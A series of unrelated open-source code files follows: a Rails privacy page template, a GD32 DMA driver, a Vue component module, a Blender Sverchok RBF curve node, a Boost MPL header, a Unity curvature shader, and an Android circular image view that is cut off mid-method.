{ "pile_set_name": "Github" }
<% title t('navigation.privacy') %> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.summary') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.summary_description') %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.user_data') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.user_data_description') %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.cookies') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.cookies_description', { google_privacy_policy: link_to(t('navigation.privacy').downcase, 'http://www.google.com/privacy.html', target: 'blank') }) %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.social_media') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.social_media_description') %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.contact') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.contact_description', { email_link: link_to(t('common.write_to_us'), "mailto:#{t('email')}"), jamie_king_media: link_to('Jamie King Media', 'http://jamieking.co.uk/resources/download-free-sample-privacy-policy.html', target: 'blank') }) %> </div> </article>
{ "pile_set_name": "Github" }
{ "name": "test", "displayName": "Test", "description": "Lorem ipsum...", "homeUrl": "https://test.org", "logoImageId": "f0552fa9-e03d-47cf-90cd-b9b0b6ba19e2" }
{ "pile_set_name": "Github" }
/*!
    \file  gd32f1x0_dma.c
    \brief dma driver
*/

/*
    Copyright (C) 2016 GigaDevice

    2014-12-26, V1.0.0, firmware for GD32F1x0(x=3,5)
    2016-01-15, V2.0.0, firmware for GD32F1x0(x=3,5,7,9)
    2016-04-30, V3.0.0, firmware update for GD32F1x0(x=3,5,7,9)
*/

#include "gd32f1x0_dma.h"

/*!
    \brief      deinitialize DMA a channel registers
    \param[in]  channelx: specify which DMA channel is deinitialized
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_deinit(dma_channel_enum channelx)
{
    /* disable DMA a channel */
    DMA_CHCTL(channelx) &= ~DMA_CHXCTL_CHEN;
    /* reset DMA channel registers */
    DMA_CHCTL(channelx) = DMA_CHCTL_RESET_VALUE;
    DMA_CHCNT(channelx) = DMA_CHCNT_RESET_VALUE;
    DMA_CHPADDR(channelx) = DMA_CHPADDR_RESET_VALUE;
    DMA_CHMADDR(channelx) = DMA_CHMADDR_RESET_VALUE;
    /* writing 1 to an interrupt-clear bit clears the corresponding flag */
    DMA_INTC |= DMA_FLAG_ADD(DMA_CHINTF_RESET_VALUE,channelx);
}

/*!
    \brief      initialize DMA channel
    \param[in]  channelx: specify which DMA channel is initialized
      \arg        DMA_CHx(x=0..6)
    \param[in]  init_struct: the data needed to initialize DMA channel
                  periph_addr: peripheral base address
                  periph_width: DMA_PERIPHERAL_WIDTH_8BIT,DMA_PERIPHERAL_WIDTH_16BIT,DMA_PERIPHERAL_WIDTH_32BIT
                  periph_inc: DMA_PERIPH_INCREASE_ENABLE,DMA_PERIPH_INCREASE_DISABLE
                  memory_addr: memory base address
                  memory_width: DMA_MEMORY_WIDTH_8BIT,DMA_MEMORY_WIDTH_16BIT,DMA_MEMORY_WIDTH_32BIT
                  memory_inc: DMA_MEMORY_INCREASE_ENABLE,DMA_MEMORY_INCREASE_DISABLE
                  direction: DMA_PERIPHERA_TO_MEMORY,DMA_MEMORY_TO_PERIPHERA
                  number: the number of remaining data to be transferred by the DMA
                  priority: DMA_PRIORITY_LOW,DMA_PRIORITY_MEDIUM,DMA_PRIORITY_HIGH,DMA_PRIORITY_ULTRA_HIGH
    \param[out] none
    \retval     none
*/
void dma_init(dma_channel_enum channelx,dma_parameter_struct init_struct)
{
    uint32_t ctl;

    /* configure peripheral base address */
    DMA_CHPADDR(channelx) = init_struct.periph_addr;

    /* configure memory base address */
    DMA_CHMADDR(channelx) = init_struct.memory_addr;

    /* configure the number of remaining data to be transferred */
    DMA_CHCNT(channelx) = init_struct.number;

    /* configure peripheral transfer width, memory transfer width and channel priority
       with a read-modify-write so unrelated CHxCTL bits are preserved */
    ctl = DMA_CHCTL(channelx);
    ctl &= ~(DMA_CHXCTL_PWIDTH | DMA_CHXCTL_MWIDTH | DMA_CHXCTL_PRIO);
    ctl |= (init_struct.periph_width | init_struct.memory_width | init_struct.priority);
    DMA_CHCTL(channelx)=ctl;

    /* configure peripheral increasing mode */
    if(DMA_PERIPH_INCREASE_ENABLE == init_struct.periph_inc){
        DMA_CHCTL(channelx) |= DMA_CHXCTL_PNAGA;
    }else{
        DMA_CHCTL(channelx) &= ~DMA_CHXCTL_PNAGA;
    }

    /* configure memory increasing mode */
    if(DMA_MEMORY_INCREASE_ENABLE == init_struct.memory_inc){
        DMA_CHCTL(channelx) |= DMA_CHXCTL_MNAGA;
    }else{
        DMA_CHCTL(channelx) &= ~DMA_CHXCTL_MNAGA;
    }

    /* configure the direction of data transfer */
    if(DMA_PERIPHERA_TO_MEMORY == init_struct.direction){
        DMA_CHCTL(channelx) &= ~DMA_CHXCTL_TM;
    }else{
        DMA_CHCTL(channelx) |= DMA_CHXCTL_TM;
    }
}

/*!
    \brief      check DMA flag is set or not
    \param[in]  channelx: specify which DMA channel to get flag
      \arg        DMA_CHx(x=0..6)
    \param[in]  flag: specify which flag to get
      \arg        DMA_INTF_ANYIF: global interrupt flag of channel
      \arg        DMA_CHXCTL_FTFIF: transfer complete flag of channel
      \arg        DMA_CHXCTL_HTFIF: half transfer complete flag of channel
      \arg        DMA_CHXCTL_TAEIF: error flag of channel
    \param[out] none
    \retval     FlagStatus: SET or RESET
*/
/* NOTE(review): the \arg macro names above mix CHXCTL/INTF prefixes; confirm
   the exact flag macro names against gd32f1x0_dma.h */
FlagStatus dma_interrupt_flag_get(dma_channel_enum channelx,uint32_t flag)
{
    /* DMA_FLAG_ADD shifts the per-channel flag to this channel's bit position */
    if(DMA_INTF & DMA_FLAG_ADD(flag,channelx)){
        return SET;
    }else{
        return RESET;
    }
}

/*!
    \brief      clear DMA a channel flag
    \param[in]  channelx: specify which DMA channel to clear flag
      \arg        DMA_CHx(x=0..6)
    \param[in]  flag: specify which flag to clear
      \arg        DMA_INTF_ANYIC: clear global interrupt flag of channel
      \arg        DMA_CHXCTL_FTFIF: clear transfer complete flag of channel
      \arg        DMA_CHXCTL_HTFIFC: clear half transfer complete flag of channel
      \arg        DMA_CHXCTL_TAEIFC: clear error flag of channel
    \param[out] none
    \retval     none
*/
/* NOTE(review): the \arg macro names above mix CHXCTL/INTC prefixes; confirm
   the exact flag macro names against gd32f1x0_dma.h */
void dma_interrupt_flag_clear(dma_channel_enum channelx,uint32_t flag)
{
    DMA_INTC |= DMA_FLAG_ADD(flag,channelx);
}

/*!
    \brief      set DMA peripheral base address
    \param[in]  channelx: specify which DMA channel to set peripheral base address
      \arg        DMA_CHx(x=0..6)
    \param[in]  address: peripheral base address
    \param[out] none
    \retval     none
*/
void dma_periph_address_config(dma_channel_enum channelx,uint32_t address)
{
    DMA_CHPADDR(channelx) = address;
}

/*!
    \brief      set DMA memory base address
    \param[in]  channelx: specify which DMA channel to set memory base address
      \arg        DMA_CHx(x=0..6)
    \param[in]  address: memory base address
    \param[out] none
    \retval     none
*/
void dma_memory_address_config(dma_channel_enum channelx,uint32_t address)
{
    DMA_CHMADDR(channelx) = address;
}

/*!
    \brief      set the number of remaining data to be transferred by the DMA
    \param[in]  channelx: specify which DMA channel to set number
      \arg        DMA_CHx(x=0..6)
    \param[in]  number: the number of remaining data to be transferred by the DMA
    \param[out] none
    \retval     none
*/
void dma_transfer_number_config(dma_channel_enum channelx,uint32_t number)
{
    DMA_CHCNT(channelx) = number;
}

/*!
    \brief      get the number of remaining data to be transferred by the DMA
    \param[in]  channelx: specify which DMA channel to get number
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     uint32_t: the number of remaining data to be transferred by the DMA
*/
uint32_t dma_transfer_number_get(dma_channel_enum channelx)
{
    return (uint32_t)DMA_CHCNT(channelx);
}

/*!
    \brief      enable memory to memory mode
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_memory_to_memory_enable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) |= DMA_CHXCTL_M2M;
}

/*!
    \brief      disable memory to memory mode
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_memory_to_memory_disable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) &= ~DMA_CHXCTL_M2M;
}

/*!
    \brief      configure priority level of DMA channel
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[in]  priority: priority level of this channel
      \arg        DMA_PRIORITY_LOW: low priority
      \arg        DMA_PRIORITY_MEDIUM: medium priority
      \arg        DMA_PRIORITY_HIGH: high priority
      \arg        DMA_PRIORITY_ULTRA_HIGH: ultra high priority
    \param[out] none
    \retval     none
*/
void dma_priority_config(dma_channel_enum channelx,uint32_t priority)
{
    uint32_t ctl;
    /* acquire DMA_CHxCTL register */
    ctl = DMA_CHCTL(channelx);
    /* update only the priority field, preserving all other bits */
    ctl &= ~DMA_CHXCTL_PRIO;
    ctl |= priority;
    DMA_CHCTL(channelx) = ctl;
}

/*!
    \brief      configure transfer data size of memory
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[in]  msize: transfer data size of memory
      \arg        DMA_MEMORY_WIDTH_8BIT: transfer data size of memory is 8-bit
      \arg        DMA_MEMORY_WIDTH_16BIT: transfer data size of memory is 16-bit
      \arg        DMA_MEMORY_WIDTH_32BIT: transfer data size of memory is 32-bit
    \param[out] none
    \retval     none
*/
void dma_memory_width_config (dma_channel_enum channelx,uint32_t msize)
{
    uint32_t ctl;
    /* acquire DMA_CHxCTL register */
    ctl = DMA_CHCTL(channelx);
    /* update only the memory width field, preserving all other bits */
    ctl &= ~DMA_CHXCTL_MWIDTH;
    ctl |= msize;
    DMA_CHCTL(channelx) = ctl;
}

/*!
    \brief      configure transfer data size of peripheral
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[in]  psize: transfer data size of peripheral
      \arg        DMA_PERIPHERAL_WIDTH_8BIT: transfer data size of peripheral is 8-bit
      \arg        DMA_PERIPHERAL_WIDTH_16BIT: transfer data size of peripheral is 16-bit
      \arg        DMA_PERIPHERAL_WIDTH_32BIT: transfer data size of peripheral is 32-bit
    \param[out] none
    \retval     none
*/
void dma_periph_width_config (dma_channel_enum channelx,uint32_t psize)
{
    uint32_t ctl;
    /* acquire DMA_CHxCTL register */
    ctl = DMA_CHCTL(channelx);
    /* update only the peripheral width field, preserving all other bits */
    ctl &= ~DMA_CHXCTL_PWIDTH;
    ctl |= psize;
    DMA_CHCTL(channelx) = ctl;
}

/*!
    \brief      enable next address increment mode of memory
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_memory_increase_enable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) |= DMA_CHXCTL_MNAGA;
}

/*!
    \brief      disable next address increment mode of memory
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_memory_increase_disable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) &= ~DMA_CHXCTL_MNAGA;
}

/*!
    \brief      enable next address increment mode of peripheral
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_periph_increase_enable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) |= DMA_CHXCTL_PNAGA;
}

/*!
    \brief      disable next address increment mode of peripheral
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_periph_increase_disable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) &= ~DMA_CHXCTL_PNAGA;
}

/*!
    \brief      enable DMA circulation (circular) mode
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_circulation_enable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) |= DMA_CHXCTL_CMEN;
}

/*!
    \brief      disable DMA circulation (circular) mode
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_circulation_disable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) &= ~DMA_CHXCTL_CMEN;
}

/*!
    \brief      configure the direction of data transfer on the channel
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[in]  direction: specify the direction of data transfer
      \arg        DMA_PERIPHERA_TO_MEMORY: read from peripheral and write to memory
      \arg        DMA_MEMORY_TO_PERIPHERA: read from memory and write to peripheral
    \param[out] none
    \retval     none
*/
void dma_transfer_direction_config(dma_channel_enum channelx,uint8_t direction)
{
    if(DMA_PERIPHERA_TO_MEMORY == direction){
        DMA_CHCTL(channelx) &= ~DMA_CHXCTL_TM;
    } else {
        DMA_CHCTL(channelx) |= DMA_CHXCTL_TM;
    }
}

/*!
    \brief      enable DMA interrupt
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[in]  source: specify which interrupt to enable
      \arg        DMA_CHXCTL_TAEIE: channel error interrupt
      \arg        DMA_CHXCTL_HTFIE: channel transfer half complete interrupt
      \arg        DMA_CHXCTL_FTFIE: channel transfer complete interrupt
    \param[out] none
    \retval     none
*/
void dma_interrupt_enable(dma_channel_enum channelx,uint32_t source)
{
    DMA_CHCTL(channelx) |= source;
}

/*!
    \brief      disable DMA interrupt
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[in]  source: specify which interrupt to disable
      \arg        DMA_CHXCTL_TAEIE: channel error interrupt
      \arg        DMA_CHXCTL_HTFIE: channel transfer half complete interrupt
      \arg        DMA_CHXCTL_FTFIE: channel transfer complete interrupt
    \param[out] none
    \retval     none
*/
void dma_interrupt_disable(dma_channel_enum channelx,uint32_t source)
{
    DMA_CHCTL(channelx) &= ~source;
}

/*!
    \brief      enable DMA channel
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_channel_enable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) |= DMA_CHXCTL_CHEN;
}

/*!
    \brief      disable DMA channel
    \param[in]  channelx: specify which DMA channel
      \arg        DMA_CHx(x=0..6)
    \param[out] none
    \retval     none
*/
void dma_channel_disable(dma_channel_enum channelx)
{
    DMA_CHCTL(channelx) &= ~DMA_CHXCTL_CHEN;
}
{ "pile_set_name": "Github" }
/* @flow */ import VNode from './vnode' import { resolveConstructorOptions } from 'core/instance/init' import { queueActivatedComponent } from 'core/observer/scheduler' import { createFunctionalComponent } from './create-functional-component' import { warn, isDef, isUndef, isTrue, isObject } from '../util/index' import { resolveAsyncComponent, createAsyncPlaceholder, extractPropsFromVNodeData } from './helpers/index' import { callHook, activeInstance, updateChildComponent, activateChildComponent, deactivateChildComponent } from '../instance/lifecycle' import { isRecyclableComponent, renderRecyclableComponentTemplate } from 'weex/runtime/recycle-list/render-component-template' // hooks to be invoked on component VNodes during patch const componentVNodeHooks = { init ( vnode: VNodeWithData, hydrating: boolean, parentElm: ?Node, refElm: ?Node ): ?boolean { if (!vnode.componentInstance || vnode.componentInstance._isDestroyed) { const child = vnode.componentInstance = createComponentInstanceForVnode( vnode, activeInstance, parentElm, refElm ) child.$mount(hydrating ? 
vnode.elm : undefined, hydrating) } else if (vnode.data.keepAlive) { // kept-alive components, treat as a patch const mountedNode: any = vnode // work around flow componentVNodeHooks.prepatch(mountedNode, mountedNode) } }, prepatch (oldVnode: MountedComponentVNode, vnode: MountedComponentVNode) { const options = vnode.componentOptions const child = vnode.componentInstance = oldVnode.componentInstance updateChildComponent( child, options.propsData, // updated props options.listeners, // updated listeners vnode, // new parent vnode options.children // new children ) }, insert (vnode: MountedComponentVNode) { const { context, componentInstance } = vnode if (!componentInstance._isMounted) { componentInstance._isMounted = true callHook(componentInstance, 'mounted') } if (vnode.data.keepAlive) { if (context._isMounted) { // vue-router#1212 // During updates, a kept-alive component's child components may // change, so directly walking the tree here may call activated hooks // on incorrect children. Instead we push them into a queue which will // be processed after the whole patch process ended. queueActivatedComponent(componentInstance) } else { activateChildComponent(componentInstance, true /* direct */) } } }, destroy (vnode: MountedComponentVNode) { const { componentInstance } = vnode if (!componentInstance._isDestroyed) { if (!vnode.data.keepAlive) { componentInstance.$destroy() } else { deactivateChildComponent(componentInstance, true /* direct */) } } } } const hooksToMerge = Object.keys(componentVNodeHooks) export function createComponent ( Ctor: Class<Component> | Function | Object | void, data: ?VNodeData, context: Component, children: ?Array<VNode>, tag?: string ): VNode | void { if (isUndef(Ctor)) { return } const baseCtor = context.$options._base // plain options object: turn it into a constructor if (isObject(Ctor)) { Ctor = baseCtor.extend(Ctor) } // if at this stage it's not a constructor or an async component factory, // reject. 
if (typeof Ctor !== 'function') { if (process.env.NODE_ENV !== 'production') { warn(`Invalid Component definition: ${String(Ctor)}`, context) } return } // async component let asyncFactory if (isUndef(Ctor.cid)) { asyncFactory = Ctor Ctor = resolveAsyncComponent(asyncFactory, baseCtor, context) if (Ctor === undefined) { // return a placeholder node for async component, which is rendered // as a comment node but preserves all the raw information for the node. // the information will be used for async server-rendering and hydration. return createAsyncPlaceholder( asyncFactory, data, context, children, tag ) } } data = data || {} // resolve constructor options in case global mixins are applied after // component constructor creation resolveConstructorOptions(Ctor) // transform component v-model data into props & events if (isDef(data.model)) { transformModel(Ctor.options, data) } // extract props const propsData = extractPropsFromVNodeData(data, Ctor, tag) // functional component if (isTrue(Ctor.options.functional)) { return createFunctionalComponent(Ctor, propsData, data, context, children) } // extract listeners, since these needs to be treated as // child component listeners instead of DOM listeners const listeners = data.on // replace with listeners with .native modifier // so it gets processed during parent component patch. data.on = data.nativeOn if (isTrue(Ctor.options.abstract)) { // abstract components do not keep anything // other than props & listeners & slot // work around flow const slot = data.slot data = {} if (slot) { data.slot = slot } } // merge component management hooks onto the placeholder node mergeHooks(data) // return a placeholder vnode const name = Ctor.options.name || tag const vnode = new VNode( `vue-component-${Ctor.cid}${name ? 
`-${name}` : ''}`, data, undefined, undefined, undefined, context, { Ctor, propsData, listeners, tag, children }, asyncFactory ) // Weex specific: invoke recycle-list optimized @render function for // extracting cell-slot template. // https://github.com/Hanks10100/weex-native-directive/tree/master/component /* istanbul ignore if */ if (__WEEX__ && isRecyclableComponent(vnode)) { return renderRecyclableComponentTemplate(vnode) } return vnode } export function createComponentInstanceForVnode ( vnode: any, // we know it's MountedComponentVNode but flow doesn't parent: any, // activeInstance in lifecycle state parentElm?: ?Node, refElm?: ?Node ): Component { const options: InternalComponentOptions = { _isComponent: true, parent, _parentVnode: vnode, _parentElm: parentElm || null, _refElm: refElm || null } // check inline-template render functions const inlineTemplate = vnode.data.inlineTemplate if (isDef(inlineTemplate)) { options.render = inlineTemplate.render options.staticRenderFns = inlineTemplate.staticRenderFns } return new vnode.componentOptions.Ctor(options) } function mergeHooks (data: VNodeData) { if (!data.hook) { data.hook = {} } for (let i = 0; i < hooksToMerge.length; i++) { const key = hooksToMerge[i] const fromParent = data.hook[key] const ours = componentVNodeHooks[key] data.hook[key] = fromParent ? mergeHook(ours, fromParent) : ours } } function mergeHook (one: Function, two: Function): Function { return function (a, b, c, d) { one(a, b, c, d) two(a, b, c, d) } } // transform component v-model info (value and callback) into // prop and event handler respectively. function transformModel (options, data: any) { const prop = (options.model && options.model.prop) || 'value' const event = (options.model && options.model.event) || 'input' ;(data.props || (data.props = {}))[prop] = data.model.value const on = data.on || (data.on = {}) if (isDef(on[event])) { on[event] = [data.model.callback].concat(on[event]) } else { on[event] = data.model.callback } }
{ "pile_set_name": "Github" }
import numpy as np

import bpy
from bpy.props import FloatProperty, EnumProperty, BoolProperty, IntProperty

from sverchok.node_tree import SverchCustomTreeNode, throttled
from sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level
from sverchok.utils.logging import info, exception
from sverchok.utils.curve import make_euclidian_ts
from sverchok.utils.curve.rbf import SvRbfCurve
from sverchok.utils.dummy_nodes import add_dummy
from sverchok.dependencies import scipy
from sverchok.utils.math import rbf_functions

if scipy is None:
    add_dummy('SvRbfCurveNode', "RBF Curve", 'scipy')
else:
    from scipy.interpolate import Rbf

class SvExRbfCurveNode(bpy.types.Node, SverchCustomTreeNode):
    """
    Triggers: Minimal RBF Curve
    Tooltip: Generate interpolating or approximating curve by RBF method
    """
    bl_idname = 'SvExRbfCurveNode'
    bl_label = 'RBF Curve'
    bl_icon = 'CURVE_NCURVE'
    sv_icon = 'SV_INTERP_CURVE'

    # Radial basis function kernel passed through to scipy's Rbf.
    function : EnumProperty(
            name = "Function",
            items = rbf_functions,
            default = 'multiquadric',
            update = updateNode)

    # Smoothing factor: 0 means pure interpolation, >0 approximates.
    smooth : FloatProperty(
            name = "Smooth",
            default = 0.0,
            min = 0.0,
            update = updateNode)

    # Adjustable kernel shape constant, forwarded to Rbf's `epsilon`.
    epsilon : FloatProperty(
            name = "Epsilon",
            default = 1.0,
            min = 0.0,
            update = updateNode)

    def draw_buttons(self, context, layout):
        """Draw the kernel-function selector in the node UI."""
        layout.prop(self, "function")

    def sv_init(self, context):
        """Create the node's input and output sockets."""
        self.inputs.new('SvVerticesSocket', "Vertices")
        self.inputs.new('SvStringsSocket', "Epsilon").prop_name = 'epsilon'
        self.inputs.new('SvStringsSocket', "Smooth").prop_name = 'smooth'
        self.outputs.new('SvCurveSocket', "Curve")

    def process(self):
        """Build one SvRbfCurve per vertex list by RBF interpolation
        of position against euclidean-chord parameter values in [0, 1]."""
        if not any(socket.is_linked for socket in self.outputs):
            return

        vertices_s = self.inputs['Vertices'].sv_get()
        vertices_s = ensure_nesting_level(vertices_s, 3)
        epsilon_s = self.inputs['Epsilon'].sv_get()
        smooth_s = self.inputs['Smooth'].sv_get()

        curves_out = []
        for vertices, epsilon, smooth in zip_long_repeat(vertices_s, epsilon_s, smooth_s):
            # Socket values arrive wrapped in (possibly nested) lists; unwrap
            # one level to a scalar. BUGFIX: the original test was
            # `isinstance(..., (list, int))`, so a plain int entered the
            # branch and `epsilon[0]` raised TypeError (ints are not
            # subscriptable). Only sequences should be unwrapped.
            if isinstance(epsilon, (list, tuple)):
                epsilon = epsilon[0]
            if isinstance(smooth, (list, tuple)):
                smooth = smooth[0]
            vertices = np.array(vertices)
            # Parameter values proportional to cumulative chord length.
            ts = make_euclidian_ts(vertices)
            rbf = Rbf(ts, vertices,
                    function=self.function,
                    smooth=smooth,
                    epsilon=epsilon, mode='N-D')
            curve = SvRbfCurve(rbf, (0.0, 1.0))
            curves_out.append(curve)

        self.outputs['Curve'].sv_set(curves_out)

def register():
    if scipy is not None:
        bpy.utils.register_class(SvExRbfCurveNode)

def unregister():
    if scipy is not None:
        bpy.utils.unregister_class(SvExRbfCurveNode)
{ "pile_set_name": "Github" }
#ifndef BOOST_MPL_SET_AUX_INSERT_IMPL_HPP_INCLUDED
#define BOOST_MPL_SET_AUX_INSERT_IMPL_HPP_INCLUDED

// Copyright Aleksey Gurtovoy 2003-2007
// Copyright David Abrahams 2003-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// See http://www.boost.org/libs/mpl for documentation.

// $Id$
// $Date$
// $Revision$

#include <boost/mpl/insert_fwd.hpp>
#include <boost/mpl/set/aux_/has_key_impl.hpp>
#include <boost/mpl/set/aux_/item.hpp>
#include <boost/mpl/set/aux_/tag.hpp>
#include <boost/mpl/identity.hpp>
#include <boost/mpl/base.hpp>
#include <boost/mpl/eval_if.hpp>
#include <boost/mpl/aux_/na.hpp>
#include <boost/type_traits/is_same.hpp>

namespace boost { namespace mpl {

namespace aux {

// Computes the result of inserting key T into an mpl::set:
//  - if the set already contains T, the result is Set unchanged;
//  - if T equals the set's most recently masked (erased) key
//    (Set::last_masked_), the mask is removed by rebasing to the
//    underlying set (base<Set>) — presumably so erase-then-insert
//    round-trips without growing the item chain;
//  - otherwise a new s_item node holding T is layered on top of the
//    set's item chain (Set::item_).
template< typename Set, typename T > struct set_insert_impl
    : eval_if<
          has_key_impl<aux::set_tag>::apply<Set,T>
        , identity<Set>
        , eval_if<
              is_same< T,typename Set::last_masked_ >
            , base<Set>
            , identity< s_item<T,typename Set::item_> >
            >
        >
{
};

}

// insert<> dispatch for the set tag. Sets ignore the position hint:
// when insert is called with two arguments, PosOrKey carries the key
// and KeyOrNA is na; with three arguments, KeyOrNA is the key and the
// PosOrKey hint is discarded. if_na selects whichever is the real key.
template<>
struct insert_impl< aux::set_tag >
{
    template<
          typename Set
        , typename PosOrKey
        , typename KeyOrNA
        >
    struct apply
        : aux::set_insert_impl<
              Set
            , typename if_na<KeyOrNA,PosOrKey>::type
            >
    {
    };
};

}}

#endif // BOOST_MPL_SET_AUX_INSERT_IMPL_HPP_INCLUDED
{ "pile_set_name": "Github" }
//reference: http://madebyevan.com/shaders/curvature/
//It looks the best with high-poly geometry
Shader "Screen Space Curvature Shader"
{
	Subshader
	{
		Tags { "RenderType"="Opaque" }
		Pass
		{
			Tags{ "LightMode" = "ForwardBase" }
			CGPROGRAM
			#pragma vertex vertex_shader
			#pragma fragment pixel_shader
			#pragma target 3.0

			struct structure
			{
				float4 gl_Position : SV_POSITION;
				float3 normal : NORMAL;
				// Object-space vertex position, passed through untransformed.
				float3 vertex : TEXCOORD0;
			};

			structure vertex_shader (float4 vertex:POSITION, float3 normal:NORMAL)
			{
				structure vs;
				vs.gl_Position = UnityObjectToClipPos (vertex);
				vs.normal = normal;
				vs.vertex = vertex;
				return vs;
			}

			float4 pixel_shader (structure ps) : COLOR
			{
				float3 n = normalize(ps.normal);
				// Screen-space partial derivatives of the interpolated
				// normal; large derivatives = rapidly turning surface.
				float3 dx = ddx(n);
				float3 dy = ddy(n);
				float3 xneg = n - dx;
				float3 xpos = n + dx;
				float3 yneg = n - dy;
				float3 ypos = n + dy;
				// Distance of the fragment from the object-space origin
				// (ps.vertex is object-space). NOTE(review): the referenced
				// article divides by view-space depth instead -- confirm
				// this substitution is intentional.
				float depth = length(ps.vertex);
				// Curvature estimate per the reference shader; dividing by
				// depth keeps the magnitude roughly scale-independent.
				float curvature = (cross(xneg,xpos).y-cross(yneg,ypos).x)*4.0/depth;
				// Remap so zero curvature renders as mid-grey (0.5).
				return (curvature+0.5);
			}
			ENDCG
		}
	}
}
{ "pile_set_name": "Github" }
package com.idrv.coach.ui.widget; import android.content.Context; import android.content.res.Resources; import android.graphics.Canvas; import android.graphics.Color; import android.graphics.Paint; import android.graphics.RadialGradient; import android.graphics.Shader; import android.graphics.drawable.ShapeDrawable; import android.graphics.drawable.shapes.OvalShape; import android.support.v4.view.ViewCompat; import android.view.animation.Animation; import android.widget.ImageView; /** * Private class created to work around issues with AnimationListeners being * called before the animation is actually complete and support shadows on older * platforms. */ class CircleImageView extends ImageView { private static final int KEY_SHADOW_COLOR = 0x1E000000; private static final int FILL_SHADOW_COLOR = 0x3D000000; // PX private static final float X_OFFSET = 0f; private static final float Y_OFFSET = 1.75f; private static final float SHADOW_RADIUS = 3.5f; private static final int SHADOW_ELEVATION = 4; private Animation.AnimationListener mListener; private int mShadowRadius; public CircleImageView(Context context, int color, final float radius) { super(context); final float density = getContext().getResources().getDisplayMetrics().density; final int diameter = (int) (radius * density * 2); final int shadowYOffset = (int) (density * Y_OFFSET); final int shadowXOffset = (int) (density * X_OFFSET); mShadowRadius = (int) (density * SHADOW_RADIUS); ShapeDrawable circle; if (elevationSupported()) { circle = new ShapeDrawable(new OvalShape()); ViewCompat.setElevation(this, SHADOW_ELEVATION * density); } else { OvalShape oval = new OvalShadow(mShadowRadius, diameter); circle = new ShapeDrawable(oval); ViewCompat.setLayerType(this, ViewCompat.LAYER_TYPE_SOFTWARE, circle.getPaint()); circle.getPaint().setShadowLayer(mShadowRadius, shadowXOffset, shadowYOffset, KEY_SHADOW_COLOR); final int padding = (int) mShadowRadius; // set padding so the inner image sits correctly within the shadow. 
setPadding(padding, padding, padding, padding); } circle.getPaint().setColor(color); setBackgroundDrawable(circle); } private boolean elevationSupported() { return android.os.Build.VERSION.SDK_INT >= 21; } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { super.onMeasure(widthMeasureSpec, heightMeasureSpec); if (!elevationSupported()) { setMeasuredDimension(getMeasuredWidth() + mShadowRadius * 2, getMeasuredHeight() + mShadowRadius * 2); } } public void setAnimationListener(Animation.AnimationListener listener) { mListener = listener; } @Override public void onAnimationStart() { super.onAnimationStart(); if (mListener != null) { mListener.onAnimationStart(getAnimation()); } } @Override public void onAnimationEnd() { super.onAnimationEnd(); if (mListener != null) { mListener.onAnimationEnd(getAnimation()); } } /** * Update the background color of the circle image view. */ public void setBackgroundColor(int colorRes) { if (getBackground() instanceof ShapeDrawable) { final Resources res = getResources(); ((ShapeDrawable) getBackground()).getPaint().setColor(res.getColor(colorRes)); } } private class OvalShadow extends OvalShape { private RadialGradient mRadialGradient; private int mShadowRadius; private Paint mShadowPaint; private int mCircleDiameter; public OvalShadow(int shadowRadius, int circleDiameter) { super(); mShadowPaint = new Paint(); mShadowRadius = shadowRadius; mCircleDiameter = circleDiameter; mRadialGradient = new RadialGradient(mCircleDiameter / 2, mCircleDiameter / 2, mShadowRadius, new int[]{ FILL_SHADOW_COLOR, Color.TRANSPARENT }, null, Shader.TileMode.CLAMP); mShadowPaint.setShader(mRadialGradient); } @Override public void draw(Canvas 